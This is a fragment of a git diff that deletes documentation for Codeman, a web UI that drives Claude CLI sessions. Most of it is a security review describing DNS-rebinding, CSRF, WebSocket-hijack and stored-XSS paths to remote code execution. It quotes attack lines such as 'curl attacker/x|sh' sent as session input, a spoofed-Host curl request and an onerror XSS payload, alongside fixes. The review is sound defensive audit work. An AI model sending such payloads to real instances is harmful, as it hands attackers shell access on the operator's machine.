||||
oscillator.stop(ctx.currentTime + 0.15);
|
||||
}
|
||||
```
|
||||
|
||||
This produces a short 150ms sine wave beep at 660 Hz with a quick exponential fade.
|
||||
|
||||
### Audio decision logic
|
||||
|
||||
For audio to play, ALL of these must be true:
|
||||
1. `preferences.enabled` = true (master toggle)
|
||||
2. `preferences.audioAlerts` = true (global audio toggle)
|
||||
3. For known event types: `eventTypes[category].audio` = true
|
||||
4. For unknown categories (fallback): urgency must be `'critical'`
|
||||
|
||||
### AudioContext lazy initialization
|
||||
|
||||
The `AudioContext` is created lazily on first use (line 1166-1168). This is important because browsers require a user gesture before creating an AudioContext. The first audio alert may silently fail if no user interaction has occurred.
|
||||
|
||||
### Does it actually work?
|
||||
|
||||
Yes, given the prerequisites above are met. However, due to the category key mismatch (Section 3), per-event audio settings are mostly non-functional. The fallback logic means audio only plays for `critical` urgency notifications when the category is unrecognized (which is most of them).
|
||||
|
||||
|
||||
## 8. Per-Session vs Global Settings
|
||||
|
||||
### Global only
|
||||
|
||||
Notification preferences are **strictly global**. There is no per-session notification configuration.
|
||||
|
||||
- The `NotificationManager` is a singleton on the `CodemanApp` instance (line 1404)
|
||||
- Preferences are loaded once from localStorage (line 878)
|
||||
- All sessions share the same notification rules
|
||||
|
||||
### Per-session data in notifications
|
||||
|
||||
While settings are global, each notification carries `sessionId` and `sessionName` for:
|
||||
- Displaying which session triggered the notification (session chip in drawer items)
|
||||
- Click-to-switch: clicking a notification selects that session tab (line 1206-1208)
|
||||
- Browser notification onclick: focuses the window and selects the session (line 1134-1139)
|
||||
|
||||
### Stuck detection is per-session
|
||||
|
||||
The idle/stuck detection timer is per-session (using `this.idleTimers` Map at line 2383), but the threshold comes from the global `stuckThresholdMs` setting. Respawn-enabled sessions are excluded from stuck detection (line 2381).
|
||||
|
||||
### Case settings (separate system)
|
||||
|
||||
There is a separate "case settings" system (`caseSettings_<caseName>` in localStorage, lines 14513-14520) but it does not include notification preferences.
|
||||
|
||||
|
||||
## 9. Notification Layers (4-layer system)
|
||||
|
||||
The notification system operates in 4 independent layers:
|
||||
|
||||
| Layer | Description | Always On? | Controlled By |
|
||||
|-------|-------------|-----------|--------------|
|
||||
| 1. Drawer | In-app notification list (slide-out panel) | Yes (if enabled) | `preferences.enabled` |
|
||||
| 2. Tab Title | Flashing title with unread count when tab unfocused | Yes (if enabled) | `preferences.enabled` + tab visibility |
|
||||
| 3. Browser | OS-level Web Notifications | Conditional | `preferences.browserNotifications` + per-event `browser` + `Notification.permission` |
|
||||
| 4. Audio | Web Audio API beep | Conditional | `preferences.audioAlerts` + per-event `audio` |
|
||||
|
||||
### Rate limiting
|
||||
|
||||
Browser notifications are rate-limited to 1 per 3 seconds (line 1124, `BROWSER_NOTIF_RATE_LIMIT_MS`).
|
||||
|
||||
### Notification grouping
|
||||
|
||||
Same-category notifications for the same session within 5 seconds are grouped (count incremented) instead of creating new entries (line 986-996, `GROUPING_TIMEOUT_MS`).
|
||||
|
||||
### Auto-close
|
||||
|
||||
Browser notifications auto-close after 8 seconds (line 1143, `AUTO_CLOSE_NOTIFICATION_MS`).
|
||||
|
||||
### List cap
|
||||
|
||||
The in-app notification list is capped at 100 entries (line 1014, FIFO eviction).
|
||||
|
||||
|
||||
## 10. Key Issues and Recommendations
|
||||
|
||||
### Issue 1: Category Key Mismatch (HIGH PRIORITY)
|
||||
|
||||
The per-event settings in the UI are effectively non-functional because the category strings used in `notify()` calls (`hook-permission`, `hook-idle`, `session-error`, etc.) do not match the `eventTypes` keys in preferences (`permission_prompt`, `idle_prompt`, `session_error`, etc.).
|
||||
|
||||
**Fix options**:
|
||||
- A) Change all `notify()` category values to match the `eventTypes` keys
|
||||
- B) Change the `eventTypes` keys to match the categories used in `notify()` calls
|
||||
- C) Add a mapping function in `notify()` that normalizes categories to eventType keys
|
||||
|
||||
Option A is the cleanest since the eventTypes keys match the hook event names from Claude Code.
|
||||
|
||||
### Issue 2: `session_error` hardcoded in save
|
||||
|
||||
In `saveAppSettings()` at line 9425-9429, `session_error` has its browser setting hardcoded to mirror `permission_prompt`'s browser toggle and its audio is always `false`. There is no dedicated UI row for session errors. Similarly, `token_milestone` is hardcoded to `enabled: true, browser: false, audio: false` with no UI controls (lines 9435-9439).
|
||||
|
||||
### Issue 3: Subagent spawn/complete share a single UI row
|
||||
|
||||
Both `subagent_spawn` and `subagent_complete` are controlled by a single "Subagent activity" row in the UI (lines 9445-9454). This is intentional but worth noting.
|
||||
|
||||
### Issue 4: Mobile default discoverability
|
||||
|
||||
Mobile users have notifications disabled by default. There is no onboarding prompt or toast suggesting they enable notifications. A user on mobile would need to find Settings > Notifications and enable the master toggle.
|
||||
|
||||
### Issue 5: Server-side prefs are write-only in practice
|
||||
|
||||
Because localStorage always wins over server prefs (unless localStorage is empty), the server copy of notification preferences is effectively a one-time bootstrap for new devices. Changes made on one device do not propagate to another device that already has local prefs.
|
||||
|
||||
|
||||
## 11. File Reference
|
||||
|
||||
| File | Lines | What |
|
||||
|------|-------|------|
|
||||
| `src/web/public/app.js` | 11-16 | Constants (thresholds, caps, intervals) |
|
||||
| `src/web/public/app.js` | 120-180 | `MobileDetection` utility |
|
||||
| `src/web/public/app.js` | 859-1253 | `NotificationManager` class |
|
||||
| `src/web/public/app.js` | 896-950 | `loadPreferences()` with migration |
|
||||
| `src/web/public/app.js` | 952-960 | `getStorageKey()` and `savePreferences()` |
|
||||
| `src/web/public/app.js` | 962-1039 | `notify()` decision logic |
|
||||
| `src/web/public/app.js` | 1106-1161 | Browser notification + permission request |
|
||||
| `src/web/public/app.js` | 1163-1181 | Audio alert via Web Audio API |
|
||||
| `src/web/public/app.js` | 9234-9338 | `openAppSettings()` - populates notification UI |
|
||||
| `src/web/public/app.js` | 9362-9487 | `saveAppSettings()` - saves all prefs |
|
||||
| `src/web/public/app.js` | 9562-9624 | Device-aware settings storage keys |
|
||||
| `src/web/public/app.js` | 9626-9657 | `applyHeaderVisibilitySettings()` - bell icon visibility |
|
||||
| `src/web/public/app.js` | 9787-9828 | `loadAppSettingsFromServer()` - server sync |
|
||||
| `src/web/public/app.js` | 2335-2883 | SSE event handlers that call `notify()` |
|
||||
| `src/web/public/index.html` | 63-66 | Notification bell button + badge |
|
||||
| `src/web/public/index.html` | 974-1092 | Notifications settings tab HTML |
|
||||
| `src/web/public/index.html` | 1395-1406 | Notification drawer HTML |
|
||||
| `src/web/public/styles.css` | 2586-2748 | Settings grid + event type grid CSS |
|
||||
| `src/web/public/styles.css` | 3978-4151 | Notification badge, drawer, items CSS |
|
||||
| `src/web/public/mobile.css` | 1050-1058 | Mobile notification drawer override |
|
||||
| `src/web/server.ts` | 3073-3129 | `GET/PUT /api/settings` endpoints |
|
||||
@@ -1,149 +0,0 @@
|
||||
# Codeman Security Review — 2026-06-09
|
||||
|
||||
> **⚠️ Remediation status (updated 2026‑06‑09):** the two CRITICALs and 5 of the 7
|
||||
> HIGHs below were **fixed the same day in commit `c669518` (shipped as 0.9.5)** —
|
||||
> an always‑on `Host`‑header + cross‑site `Origin` allowlist (`registerHostGuard`),
|
||||
> a raw `text/plain` body parser, a WebSocket `Origin`/`Host` check, and
|
||||
> HTML‑escaped subagent‑panel sinks. **The present‑tense "is exploitable" wording
|
||||
> below describes the pre‑fix v0.9.4 state.** Still open: **H2** (the self‑updater
|
||||
> trusts an unsigned git tag — needs signing infra) and dropping CSP
|
||||
> `'unsafe-inline'` (needs a nonce migration; H4's escaping already neutralises the
|
||||
> known XSS). Per‑finding breakdown in the *Implementation status* section below;
|
||||
> regression tests in `test/network-host-guard.test.ts`.
|
||||
|
||||
**Scope:** whole codebase (branch `master`, v0.9.4). Adversarial multi-agent review: 10 dimension specialists → diverse-lens skeptic verification of every finding (HIGH/CRITICAL got 3 independent refutation passes) → completeness-critic sweep. 47 raw findings → **25 survived verification** (+1 from the critic). 22 were refuted (mostly "already inside the OS trust boundary" same-uid claims and doc-accuracy nits). Several exploits were **confirmed live** with `curl` against throwaway test ports.
|
||||
|
||||
## TL;DR — the one thing that matters
|
||||
|
||||
The default, *documented-as-safe* configuration (loopback bind + no `CODEMAN_PASSWORD`) is **remotely exploitable to RCE by any website the operator merely visits.** Every session runs `--dangerously-skip-permissions`, so "send input to a session" == "run arbitrary shell as the operator." Two missing, standard controls cause almost all of the serious findings:
|
||||
|
||||
- **(A) No `Host`-header allowlist** → DNS-rebinding turns a malicious page into a same-origin client of `127.0.0.1`.
|
||||
- **(B) No global Origin/CSRF check on state-changing routes, plus a global `text/plain` body parser** → a plain cross-site `fetch` (a CORS "simple request", no preflight) submits JSON to the API. Write-only access is enough for RCE.
|
||||
|
||||
Fix (A) + (B) + drop CSP `unsafe-inline` / escape the subagent panel, and the two CRITICALs and 5 of the 7 HIGHs collapse.
|
||||
|
||||
> Note: this is *not* a claim that the existing trust model is wrongly documented. `docs/security-architecture.md` is unusually honest. The problem is that the model assumes "loopback + no password" is safe against a browsing operator — and the browser (DNS rebinding + the text/plain parser) breaks that assumption.
|
||||
|
||||
---
|
||||
|
||||
## CRITICAL
|
||||
|
||||
### C1 — No `Host`-header allowlist → DNS rebinding → full API → RCE (default no-auth install)
|
||||
`src/web/server.ts:1697` (listen, no host validation) · `src/web/middleware/auth.ts:163-211` (no Host check). Actor: A2 (malicious website) ⇒ A1-equivalent RCE. **3/3 verifiers confirmed; live-confirmed.**
|
||||
|
||||
A page on `evil.example` (DNS TTL≈1s) is loaded by the operator, then DNS is rebound to `127.0.0.1`. Subsequent `fetch('http://evil.example:3000/...')` are now **same-origin** with Codeman (so CORS never engages), and with no password there are no credentials to miss. The page does `POST /api/sessions {workingDir}` → reads the session id from the same-origin response → `POST /api/sessions/<id>/input {input:"curl attacker/x|sh\r"}`. Confirmed: `curl -H 'Host: attacker.evil.com' -X POST -d '{"workingDir":"/tmp"}' http://127.0.0.1:<port>/api/sessions` → `200`.
|
||||
|
||||
**Fix:** early `onRequest` hook (before routing) that rejects any request whose `Host` is not in `{localhost, 127.0.0.1, ::1, configured --host, CODEMAN_ALLOWED_HOSTS}` with `403`. This is *the* standard anti-rebinding control for localhost dev servers and the single highest-value fix.
|
||||
|
||||
### C2 — Global `text/plain` content-type parser JSON-parses every body → cross-site CSRF *without* rebinding
|
||||
`src/web/server.ts:710-716`. Actor: A2. **3/3 verifiers confirmed; live-confirmed.**
|
||||
|
||||
A global parser registered for `text/plain` runs `JSON.parse` on the body of **every** route. `text/plain` is a CORS *simple* content type, so a cross-origin `fetch(..., {method:'POST', headers:{'Content-Type':'text/plain'}, body:'{...}'})` reaches the handler **with no preflight**. SameSite=lax + reflected-CORS don't help: on the no-auth default there's no cookie to gate, and the side effect happens regardless of whether the attacker can read the response. Confirmed: cross-origin (`Origin: https://evil.com`) `POST /api/sessions` with `Content-Type: text/plain` → `200` (session created); same against `/input` parsed+validated the JSON body.
|
||||
|
||||
**Fix:** remove the global `text/plain` JSON parser (parse the one crash-diagnostics body inside its own handler), **and** add a global same-origin/CSRF guard on all non-GET routes (see H3). Combine with C1's Host allowlist so the host comparison itself can't be rebound.
|
||||
|
||||
---
|
||||
|
||||
## HIGH
|
||||
|
||||
### H1 — Self-update is unauthenticated/CSRF-triggerable → forced update + RCE pivot
|
||||
`src/web/routes/system-routes.ts:313`. Actor: A1/A2. **3/3 confirmed.**
|
||||
`fetch('http://127.0.0.1:3000/api/system/update',{method:'POST',mode:'no-cors'})` from any page (no body, no preflight) kicks off the detached updater on a no-password install. On its own: forced pull/rebuild/restart (availability + forces the latest tag). Chained with H2: full RCE.
|
||||
**Fix:** require Origin/CSRF on this route *independent of the password*; refuse self-update when no password is set; mint a confirmation token via a prior GET.
|
||||
|
||||
### H2 — Self-updater builds an **unsigned, unverified** git tag (no signature / commit pin) *(contested 2/3)*
|
||||
`scripts/self-update.sh:139`. Actor: A5 + A1/A2 trigger.
|
||||
`isValidReleaseTag` validates only the *tag name* (`^(codeman|aicodeman)@\d+\.\d+\.\d+$`) and version ordering — never the commit. Anyone who can push a `codeman@9.9.9` tag (or compromise release CI) gets `git checkout --force` + `npm install` (arbitrary lifecycle scripts) + build + restart, as the operator. One verifier refuted on the basis that the *trigger* is auth-gated when a password is set — true, but the default has no password and H1 supplies the trigger.
|
||||
**Fix:** verify integrity, not just the name — GPG-signed tags (`git verify-tag` against a shipped maintainer key) or pin to a SHA published out-of-band; `npm ci --ignore-scripts` + an explicit audited build step; pin the remote to the expected GitHub repo.
|
||||
|
||||
### H3 — CSRF/Origin validation exists on exactly one route; the RCE-enabling routes have none
|
||||
`src/web/routes/session-routes.ts:1570-1600` (only `paste-image` is protected) vs `:229` create, `:595` input, `:635` send-key, `:404` delete. Actor: A2. **3/3 confirmed.**
|
||||
The team clearly knows the correct control (it's on `paste-image`) but didn't apply it broadly.
|
||||
**Fix:** a shared `onRequest` guard for all non-GET API routes: `Origin`/`Referer` host ∈ Host allowlist **and** `Sec-Fetch-Site == same-origin`. Global, not per-route.
|
||||
|
||||
### H4 — Stored XSS in the subagent activity panel (raw AI tool name/inputs → `innerHTML`; `unsafe-inline` ⇒ executes)
|
||||
`src/web/public/panels-ui.js:808-811` (and `:1403`). Actor: A3 (AI/subagent/MCP output), reachable by A1/A2. **3/3 confirmed.**
|
||||
`renderSubagentDetail()` sets `innerHTML` with un-escaped `a.tool`, `toolDetail.primary`, `displayText`. A subagent tool **name** (no length cap) or a short Bash command like `<img src=x onerror=...>` (28 chars, under the 100-char input truncation) is parsed as HTML in the operator's DOM; CSP `unsafe-inline` lets the `onerror` run → reads cookies, drives every same-origin API (i.e. types commands into a skip-permissions session), or hits the self-updater. `_renderActivityItem` is inconsistent: line 1404 escapes, line 1403 doesn't.
|
||||
**Fix:** `escapeHtml()` those fields at the sink; and drop `unsafe-inline` from `script-src` (move inline handlers to `addEventListener`/nonce) so a missed escape can't execute.
|
||||
|
||||
### H5 — WebSocket terminal route has no Origin/Host check (CSWSH + rebinding → drives skip-permissions agent)
|
||||
`src/web/routes/ws-routes.ts:62`. Actor: A2 / A1-via-tunnel. **3/3 confirmed.**
|
||||
WS upgrades aren't subject to SOP; with no password and no Origin/Host check, a cross-site page (or rebound origin) opens `ws://host/ws/sessions/<id>/terminal` and sends `{"t":"i","d":"curl attacker/x|bash\r"}`.
|
||||
**Fix:** validate `Origin` + `Host` on the upgrade, `socket.close(4003)` on mismatch (reuse the loopback-origin logic + the C1 Host allowlist).
|
||||
|
||||
### H6 — `PUT /api/settings {tunnelEnabled:true}` spawns a public cloudflared tunnel (CSRF/rebinding publishes the authless instance) *(completeness-critic find)*
|
||||
`src/web/routes/system-routes.ts:523-535`. Actor: A2 ⇒ A1. **Confirmed; no CSRF on this route.**
|
||||
If `cloudflared` is installed (the project encourages it), a cross-site `PUT` flips on a tunnel; the public `*.trycloudflare.com` URL is broadcast over SSE and exposed at `GET /api/tunnel/info` / `/api/tunnel/qr`. The attacker reads it → unauthenticated **internet** access to the skip-permissions API.
|
||||
**Fix:** treat tunnel-start as privileged — CSRF/Origin check on `PUT /api/settings`; refuse to start a tunnel when `CODEMAN_PASSWORD` is unset; don't echo the public URL on unauthenticated endpoints.
|
||||
|
||||
### (H→operational) The no-password default *is* the unauthenticated RCE surface once reachable off-host *(contested 2/3)*
|
||||
`src/web/middleware/auth.ts:45-46`. This is the *documented* trust boundary, so it's operational hardening rather than a code bug: on `--host 0.0.0.0`/LAN/tunnel without a password, any client `POST /input` → RCE. **Fix:** fail-closed (or auto-generate+print a random password) when binding non-loopback / starting a tunnel without one; constrain `workingDir` to an allowlist (cases dir / `$HOME`) to shrink blast radius.
|
||||
|
||||
---
|
||||
|
||||
## MEDIUM
|
||||
|
||||
| # | Finding | Location | Fix |
|
||||
|---|---------|----------|-----|
|
||||
| M1 | **Command injection via *discovered* tmux session name** — `muxName` taken verbatim from a live tmux session (only `startsWith('codeman-')` filtered), flows into double-quoted `execSync` in `sessionExists()`/`killSession()` **without** `isValidMuxName`. Reached on boot via `startInteractive→muxSessionExists`. Actor A4 (shared `tmux -L codeman` socket). | `src/tmux-manager.ts:925`, `:1065` | Convert these two sinks to argv form (`execFile('tmux',[...,'-t',muxName])`) like the others, **and/or** reject discovered names failing `SAFE_MUX_NAME_PATTERN` in `reconcileSessions()`. |
|
||||
| M2 | **Forged hook events over a loopback-terminating tunnel** — `/api/hook-event` bypasses auth on loopback IP, but cloudflared/tailscale-serve connect *from* `127.0.0.1` (Fastify `trustProxy:false`). A forged `idle_prompt`/`stop` drives a respawn that injects the operator's update prompt + `/clear` + `/init` into a live skip-permissions session; forged `transcript_path` streams arbitrary readable files to SSE. The in-code comment "prevents forged hook events via tunnel/LAN" is **false**. *(contested 2/3; impact real)* | `src/web/middleware/auth.ts:83-90` | Gate the bypass on a per-boot shared secret in the hook curl (`X-Codeman-Hook-Secret`), not `req.ip`. Require a password when a tunnel is active. Reject `transcript_path` outside the session workingDir. Fix the comment. |
|
||||
| M3 | **Session cookie binds nothing** — recorded `ip`/`ua` never enforced on reuse → stolen-cookie replay from anywhere; no absolute lifetime cap (refresh-on-get extends forever). | `src/web/middleware/auth.ts:102-106` | Compare `record.ip` (+ optional UA hash) on reuse; cap absolute session lifetime. |
|
||||
| M4 | **Non-loopback bind w/o password starts and only warns** (0.9.0 warn-don't-block) → real A1 exposure on misconfig; warning is a one-time stderr line. | `src/web/server.ts:1708-1724`, `src/cli.ts:486-500` | Consider fail-closed default; at minimum log to `session-lifecycle.jsonl` + persistent UI banner. |
|
||||
| M5 | **tail-file SSE route escapes the per-session boundary** — uses a *divergent* validator that `~`-expands and whitelists `/var/log` + `~/logs`, so an authorized caller streams files outside every session's workingDir (e.g. `/var/log/auth.log`). Doc overclaims "all file routes share `validateSessionFilePath`". | `src/web/routes/file-routes.ts:341`, `src/file-stream-manager.ts:400` | Route through `validateSessionFilePath()`, or drop the extra roots + `~` expansion; fix the doc. |
|
||||
| M6 | **Session display name accepts arbitrary chars** (`z.string().max(100)`, no regex) — safe only by downstream escaping (which H4 shows isn't uniform). | `src/web/schemas.ts:135,138,384` | Strip control chars / angle brackets at the schema (defense-in-depth). |
|
||||
| M7 | **Blind SSRF via attacker-supplied web-push endpoint**, triggerable through the loopback-exempt `/api/hook-event` (and via C2/CSRF). Stored endpoint URL is fetched server-side. | `src/web/server.ts:1630` (+ `src/push-store.ts`) | Allowlist known push-service hosts; reject endpoints resolving to loopback/private/link-local/169.254.169.254; re-check IP at send time (rebind-safe). |
|
||||
|
||||
---
|
||||
|
||||
## LOW / INFO (hardening)
|
||||
|
||||
- **L1** QR per-IP failure limiter + oldest-cookie eviction + body-less `/api/auth/revoke` → session/lockout DoS, all amplified behind a shared tunnel IP. `system-routes.ts:182-194` *(contested)*.
|
||||
- **L2 / L3** CSP `script-src 'unsafe-inline'` (nullifies XSS defense-in-depth app-wide) + unused `https://cdn.jsdelivr.net` with no SRI. `auth.ts:170-176` *(contested; tie into H4 fix)*.
|
||||
- **L4** `trustProxy:false` + loopback tunnels defeat the IP-based hook-event exemption (root cause of M2). `auth.ts:79-90`.
|
||||
- **L5** ralph-wizard file route uses bypassable `startsWith()` prefix containment. `case-routes.ts:424`.
|
||||
- **L6** Push subscription store has no cap → unbounded growth. `push-store.ts:70-95`.
|
||||
- **L7** VAPID private key / state / settings / audit log written `0644` in a `775` data dir; the implied `0o700` hardening is a no-op. `config/instance.ts:54` *(contested — A4/same-host only)*.
|
||||
- **L8** Unauthenticated `DELETE /api/sessions[/:id]` on the default install. `session-routes.ts:404` *(contested)*.
|
||||
- **INFO** Wide `record`/`passthrough` schemas allow arbitrary-key mass-assignment into per-instance JSON config. `schemas.ts:505,509-516`.
|
||||
- **INFO** `docs/security-architecture.md:301` overclaims supply-chain hardening and omits the self-updater as a trust surface (see H1/H2).
|
||||
|
||||
---
|
||||
|
||||
## What's solid (credit where due)
|
||||
|
||||
The verifiers **refuted 22** candidate findings — the defenses below held under adversarial scrutiny:
|
||||
|
||||
- **Request-facing command injection is well defended.** Every shell-interpolated value from an HTTP route (`workingDir`, `model`, `allowedTools`, `effort`, `resumeSessionId`, OpenCode config, env-override key/value, span-displays URL, cloudflared port, update tag, tail path) is either argv-form (no shell) or allowlist-regex-validated at the sink. `muxName=codeman-<uuid8>` is server-generated. The only gap is the *discovered*-name path (M1).
|
||||
- **Self-update command construction** is hardened (argv spawn, anchored `isValidReleaseTag`, double-quoted `$TAG`). The weakness is *integrity* (H2), not injection.
|
||||
- **Primary file-read boundary** `validateSessionFilePath` (realpath-before-check + `relative()` containment) correctly resists `../`, absolute paths, symlinks, sibling-prefix tricks; image upload uses `lstat`+`O_NOFOLLOW`+`O_EXCL`.
|
||||
- **Input validation** funnels through Zod + `parseBody`; env-override allowlist enforces the `CLAUDE_CODE_`/`OPENCODE_` prefix **and** a `BLOCKED_ENV_KEYS` set (`PATH`, `LD_PRELOAD`, `NODE_OPTIONS`, …) re-checked at apply time.
|
||||
- **Auth pipeline internals** are competent: timing-safe Basic compare, 256-bit opaque server-side session tokens, rejection-sampled base62 QR codes over 256-bit tokens with single-use atomic consumption, `logger:false` (no credential logging).
|
||||
- **Same-uid "attacks"** (tmux socket input injection, `/proc/<pid>/environ`, tmux `showenv` key disclosure) were refuted as already inside the OS trust boundary — a same-user process can already do anything to its peers.
|
||||
|
||||
---
|
||||
|
||||
## Implementation status (2026-06-09)
|
||||
|
||||
Priority fixes 1–3 + 5 landed in the same session (verified live with curl/ws against an isolated instance):
|
||||
|
||||
- ✅ **C1** — `Host`-header allowlist (`registerHostGuard` in `middleware/auth.ts`, policy in `network-auth-policy.ts`). Allows loopback/any-IP-literal/bind-host/`.ts.net`/`.trycloudflare.com`/`.cfargotunnel.com`/active-tunnel/`CODEMAN_ALLOWED_HOSTS`; rejects rebound custom domains.
|
||||
- ✅ **C2** — global `text/plain` parser no longer JSON-parses (crash-diag self-parses); plus the global cross-site Origin guard.
|
||||
- ✅ **H1, H3, H6** — global Origin/CSRF guard on all non-GET routes (covers self-update, session create/input, settings/tunnel).
|
||||
- ✅ **H4** — escaped all AI-derived sinks in `panels-ui.js` (tool name, tool detail, toolUseId, displayText).
|
||||
- ✅ **H5** — Origin/Host check on the WebSocket upgrade (`ws-routes.ts`).
|
||||
- ⏳ **H2** — deferred: needs signed-tag infra (no maintainer key yet); `npm ci --ignore-scripts` would break node-pty's native build, so not applied blindly.
|
||||
- ⏳ **CSP `unsafe-inline` removal** — deferred: inline `onclick=` handlers are pervasive; needs a nonce migration (H4's sink-escaping already neutralizes the known XSS).
|
||||
|
||||
Tests: `test/network-host-guard.test.ts` (19), `test/routes/ws-routes.test.ts` (22). Operational note: any custom reverse-proxy domain must be added via `CODEMAN_ALLOWED_HOSTS=host,.suffix`.
|
||||
|
||||
## Remediation priority
|
||||
|
||||
1. **Add a `Host`-header allowlist** (`onRequest`, pre-routing). → kills C1, blunts H5/H6 rebinding. *Highest value, smallest change.*
|
||||
2. **Remove the global `text/plain` JSON parser + add a global same-origin/CSRF guard** on all non-GET routes. → kills C2, H1, H3, H6; blunts M7. Reuse the `paste-image` pattern globally.
|
||||
3. **Drop CSP `unsafe-inline` and `escapeHtml()` the subagent panel fields** (`panels-ui.js:808-811,1403`). → kills H4, closes L2/L3.
|
||||
4. **Add tag-signature/commit verification to the self-updater** + `npm ci --ignore-scripts`. → kills H2.
|
||||
5. **Validate Origin/Host on the WS upgrade** (`ws-routes.ts:62`). → kills H5.
|
||||
6. **Refuse to start a tunnel / non-loopback bind without a password** (or auto-generate one). → closes the operational HIGH + M4 + H6's precondition.
|
||||
7. Sweep the MEDIUMs: M1 (argv tmux sinks), M2 (hook secret), M5 (tail validator), M7 (push SSRF allowlist).
|
||||
|
||||
*Generated by an automated adversarial multi-agent review (97 agents, ~4.8M tokens). Findings were independently verified but should be confirmed by a human before remediation; the live-confirmed exploits (C1, C2) are the highest-confidence items.*
|
||||
@@ -1,83 +0,0 @@
|
||||
# Respawn Controller State Machine
|
||||
|
||||
The respawn controller (`src/respawn-controller.ts`) manages autonomous session cycling. It detects idle sessions and restarts them through a configurable sequence of steps.
|
||||
|
||||
## State Diagram
|
||||
|
||||
```
|
||||
WATCHING → CONFIRMING_IDLE → AI_CHECKING → SENDING_UPDATE → WAITING_UPDATE → SENDING_CLEAR → WAITING_CLEAR
|
||||
↑ │ (new output) │ (WORKING) │
|
||||
│ ↓ ↓ ▼
|
||||
│ (reset) (cooldown) SENDING_INIT → WAITING_INIT → MONITORING_INIT
|
||||
│ │
|
||||
│ (if no work triggered) ▼
|
||||
└──────────────────────────────────────── SENDING_KICKSTART ← WAITING_KICKSTART ◄────┘
|
||||
```
|
||||
|
||||
## States
|
||||
|
||||
| State | Description |
|
||||
|-------|-------------|
|
||||
| `watching` | Monitoring session output for idle signals |
|
||||
| `confirming_idle` | Waiting to confirm session is truly idle (cancels if new output arrives) |
|
||||
| `ai_checking` | Running AI idle check to verify IDLE/WORKING status |
|
||||
| `sending_update` | About to send `/update` command |
|
||||
| `waiting_update` | Waiting for `/update` to complete (output silence) |
|
||||
| `sending_clear` | About to send `/clear` command |
|
||||
| `waiting_clear` | Waiting for `/clear` to complete |
|
||||
| `sending_init` | About to send `/init` command |
|
||||
| `waiting_init` | Waiting for `/init` to complete |
|
||||
| `monitoring_init` | Watching if `/init` triggered actual work |
|
||||
| `sending_kickstart` | About to send kickstart prompt |
|
||||
| `waiting_kickstart` | Waiting for kickstart to complete |
|
||||
| `stopped` | Controller is disabled |
|
||||
|
||||
## Configuration
|
||||
|
||||
Steps can be skipped via config:
|
||||
- `sendClear: false` - Skip the clear step
|
||||
- `sendInit: false` - Skip the init step
|
||||
- `kickstartPrompt` - Optional prompt if `/init` doesn't trigger work
|
||||
|
||||
## Step Confirmation
|
||||
|
||||
After sending each step (update, clear, init, kickstart), the controller waits for `completionConfirmMs` (10s) of output silence before proceeding. This prevents sending commands while Claude is still processing.
|
||||
|
||||
## Idle Detection (Multi-Layer)
|
||||
|
||||
1. **Completion message**: Primary signal - detects "Worked for Xm Xs" time patterns (requires "Worked" prefix to avoid false positives)
|
||||
2. **AI Idle Check** (enabled by default): Spawns a fresh Claude session in a tmux session to analyze terminal output and provide IDLE/WORKING verdict. Uses `claude-opus-4-5-20251101` by default, sends last 16k chars of terminal buffer. Timeout 90s, cooldown 3min after WORKING. Auto-disables after 3 consecutive errors. The AI prompt is conservative: when in doubt, it answers WORKING.
|
||||
3. **Output silence**: Confirms idle after `completionConfirmMs` (10s) of no new output
|
||||
4. **Token stability**: Tokens haven't changed
|
||||
5. **Working patterns absent**: No `Thinking`, `Writing`, spinner chars, etc. for at least 8 seconds
|
||||
6. **Session.isWorking check**: Final safety - if the Session class reports `isWorking=true`, idle confirmation is rejected
|
||||
|
||||
**Working Pattern Detection**:
|
||||
- Uses a rolling 300-character window to catch patterns split across PTY chunks
|
||||
- Patterns include: Thinking, Writing, Reading, Running, Searching, Editing, Creating, Deleting, Analyzing, Executing, Synthesizing, Compiling, Building, Processing, Loading, Generating, Testing, Checking, Validating, and spinner characters
|
||||
|
||||
Uses `confirming_idle` state to prevent false positives. Cancels idle confirmation if substantial output (>2 chars after ANSI stripping) arrives during the wait. Fallback: `noOutputTimeoutMs` (30s) if no output at all. AI check is triggered after the no-output fallback; if AI check is disabled/errored, falls back to direct idle confirmation.
|
||||
|
||||
## Auto-Accept Plan Mode
|
||||
|
||||
Enabled by default. After `autoAcceptDelayMs` (8s) of silence with no completion message and no `elicitation_dialog` hook signal detected, sends Enter to accept the plan. Does NOT auto-accept AskUserQuestion prompts - those are blocked via the `elicitation_dialog` notification hook which signals the respawn controller to skip auto-accept.
|
||||
|
||||
## AI Plan Checker
|
||||
|
||||
When auto-accept is about to trigger, the AI Plan Checker (`src/ai-plan-checker.ts`) can optionally verify the terminal is showing a plan mode approval prompt before sending Enter. This prevents false auto-accepts.
|
||||
|
||||
- **Model**: `claude-opus-4-5-20251101` (same as idle checker)
|
||||
- **Max context**: 8k chars (less than idle checker since plan prompts are visible at bottom)
|
||||
- **Timeout**: 60s
|
||||
- **Verdicts**: `PLAN_MODE` (safe to auto-accept) or `NOT_PLAN_MODE` (skip auto-accept)
|
||||
- **Cooldown**: 30s after NOT_PLAN_MODE verdict
|
||||
- **Error handling**: 3 consecutive errors disables the checker
|
||||
|
||||
Uses temp file for prompt to avoid E2BIG errors with large terminal buffers.
|
||||
|
||||
## Test Documentation
|
||||
|
||||
- `test/respawn-scenarios.md` - Comprehensive test scenarios for edge cases
|
||||
- `test/respawn-test-plan.md` - Test environment architecture and strategies
|
||||
- `test/respawn-test-utils.ts` - Mock utilities (MockSession, MockAiIdleChecker, MockAiPlanChecker)
|
||||
- `test/respawn-analysis.md` - Code coverage analysis and identified issues
|
||||
|
Before Width: | Height: | Size: 48 KiB |
|
Before Width: | Height: | Size: 27 KiB |
|
Before Width: | Height: | Size: 728 KiB |
|
Before Width: | Height: | Size: 894 KiB |
|
Before Width: | Height: | Size: 576 KiB |
|
Before Width: | Height: | Size: 390 KiB |
|
Before Width: | Height: | Size: 99 KiB |
|
Before Width: | Height: | Size: 56 KiB |
|
Before Width: | Height: | Size: 75 KiB |
|
Before Width: | Height: | Size: 48 KiB |
@@ -1,505 +0,0 @@
|
||||
# Security Architecture
|
||||
|
||||
This document describes Codeman's security model: how it decides who may reach
|
||||
the web UI, how requests are authenticated, how the file-serving and tmux layers
|
||||
are hardened, and the recommended ways to expose an instance safely.
|
||||
|
||||
Codeman spawns and drives Claude/OpenCode CLIs with
|
||||
`--dangerously-skip-permissions`. **Anyone who can reach an unauthenticated
|
||||
instance can run arbitrary commands as your user.** The defaults below are chosen
|
||||
so that a fresh install is safe on the machine it runs on, while remote access is
|
||||
an explicit, guided opt‑in.
|
||||
|
